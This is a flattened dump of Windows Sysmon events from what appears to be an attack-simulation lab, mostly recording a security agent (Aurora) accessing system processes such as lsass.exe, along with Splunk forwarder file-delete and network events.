Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000040881Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:11.692{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624C:\Windows\system32\lsass.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000040880Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:11.689{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F3-63C7-0900-00000000AF02}564C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 23542300x800000000000000015697Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:12.225{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B09643D2E3425107E0A9FE811005437D,SHA256=FEE7E702BAA746D1941B0A7AF4C752DF64CBF71936E5FF8FEBD48639ED164B45,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000040908Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:12.227{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4BF10DBEBD99A6F66A2FF35BDE4658C0,SHA256=8F800DC0A18B1CC5BD3C15B3E4D05D9798D85724E00398B79A9282AF4EBB3F2A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000040907Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:12.186{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2900-00000000AF02}2712C:\Windows\system32\dfssvc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 354300x800000000000000015699Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:11.933{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50063-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 23542300x800000000000000015698Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:13.332{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5A42AC522529100033D0BC01B960709B,SHA256=3EB9CE2E6ECB0FCD946E5376AE53468881508996A327C647D4E6C1F6017FEA84,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000040909Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:13.267{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E65E4A34A83F523351CA6D9A44DF7413,SHA256=CD12B448469D752CDD089954BE7FB2E960BC5AFFAC076641C1D1847E5091F146,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000015700Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:14.423{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2497684B7EE8BD68D92D475EED6B5EA4,SHA256=8B2B109DD12528199FF40498D12DFB26C46C0F754ADC302A61556BA63C1E1E4D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000040935Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:14.821{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000040934Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:14.820{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E317-63C7-ED05-00000000AF02}6268C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReaderUpdateService.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000040933Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:14.819{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E0D1-63C7-5E05-00000000AF02}5280C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000040932Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:14.819{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E0D1-63C7-5D05-00000000AF02}4176C:\Windows\system32\cmd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000040931Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:14.817{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E02A-63C7-4705-00000000AF02}4708C:\Windows\system32\wbem\wmiprvse.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000040930Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:14.810{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DE09-63C7-F204-00000000AF02}5228C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000040929Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:14.797{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 354300x800000000000000040928Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:12.588{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56259-false10.0.1.12-8000- 10341000x800000000000000040927Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:14.762{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000040926Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:14.756{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF7-63C7-B504-00000000AF02}1332C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000040925Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:14.747{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF7-63C7-B104-00000000AF02}5076C:\Windows\System32\rdpclip.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000040924Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:14.742{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF5-63C7-A404-00000000AF02}4616C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000040923Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:14.740{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF4-63C7-A104-00000000AF02}4952C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000040922Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:14.738{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA7E-63C7-F900-00000000AF02}4844C:\Windows\System32\msdtc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000040921Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:14.735{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA75-63C7-F400-00000000AF02}2900C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000040920Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:14.733{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000040919Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:14.732{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA67-63C7-AE00-00000000AF02}4912C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000040918Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:14.727{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000040917Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:14.727{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA1C-63C7-7500-00000000AF02}3048C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000040916Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:14.726{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA1C-63C7-7400-00000000AF02}3024C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000040915Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:14.725{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA05-63C7-3E00-00000000AF02}3580C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000040914Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:14.723{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA05-63C7-3B00-00000000AF02}3500C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 23542300x800000000000000040913Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:14.343{FE4C2B44-E326-63C7-F905-00000000AF02}3260ATTACKRANGE\AdministratorC:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeC:\ProgramData\Foxit Software\Foxit PDF Reader\FoxitSensor\Sensor.db-journalMD5=8C6F8F7FDFAF415C3333CF0E45EAAFA4,SHA256=B19EB2B80884DBD399BBD700AC7663CBCC7A2F61FCFC3E85BE648E9AC9FFEFDD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000040912Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:14.328{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E2066AF9201951A97A6C4866903EBA0E,SHA256=ED53A59A7BB3F20D2F32B46B3C29958F168D8249F24B86322E80152CCD2F2908,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000040911Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:14.208{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2C00-00000000AF02}1648C:\Windows\System32\vds.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000040910Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:14.207{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program 